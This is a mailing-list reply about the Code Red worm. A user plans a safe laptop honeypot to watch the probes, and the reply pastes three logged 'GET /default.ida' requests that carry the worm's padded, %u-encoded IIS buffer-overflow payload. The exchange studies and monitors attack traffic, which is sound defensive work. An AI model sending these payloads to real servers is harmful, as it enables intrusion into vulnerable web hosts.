Harry Putnam wrote:
> "J. Dow" <[EMAIL PROTECTED]> writes:
>
> > {O.O} <-- Eeek, kill her in case she's contagious!
>
> Nahhh those ==> {O.O} don't look like worms. And what could someone
> that innocent looking be carrying... he he.
>
> Hey Jo, I have a scheme to bounce off you, and any body who wants to
> add an opinion.
>
> I wanna play in this mess with my nifty log scanning tools but my
> hardware firewall just drops the connect attempts on 80. I see them
> but I don't get to see the nifty buffer overflow stuff that gets
> stuffed in. I run no web server so my hardware just drops the
> connections and reports it.
>
> Following things on comp.os.linux.security it looks like there has
> been one or several mutations that are starting to act differently.
> Reports posted there seem to indicate a general hefty increase in
> frequency like it could get really serious.
>
> Any way, I thought about firing up my laptop, jacking into my home net
> work and NATing http connects through the firewall to it.
> Fire up apache and a log catching mechanism and tinker with the show
> while it goes on. Sort of safer in that the laptop has nothing
> important on it and I could firewall it from the other two with
> iptables. Just incase newer nastier critters come into play.
>
> One problem is that the laptop is running FreeBSD (4.3) and I never
> bothered with a firewall. I know nothing about netfilter or whatever
> FreeBSD calls it. So wondered if your pet firewall (Trinity?) has a
> version for FreeBSD that sets up easily. All it would need to do is
> monitor port 80 since upstream hardware handles other trouble. Then I
> could have live action to tailor my shell/awk stuff with.
>
> And could watch the changing fortunes of `Code red' and maybe stand
> some chance of keeping up with the big boys on comp.os.linux.security
> before I get told to go to my room.
I've have been getting hammered. You can see that now there is a new variation mixed
in .
Not much of a show really on Linux unless you get a kick out of watching your logs
grow huge.
GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
-Joshua
_______________________________________________
Seawolf-list mailing list
[EMAIL PROTECTED]
https://listman.redhat.com/mailman/listinfo/seawolf-list
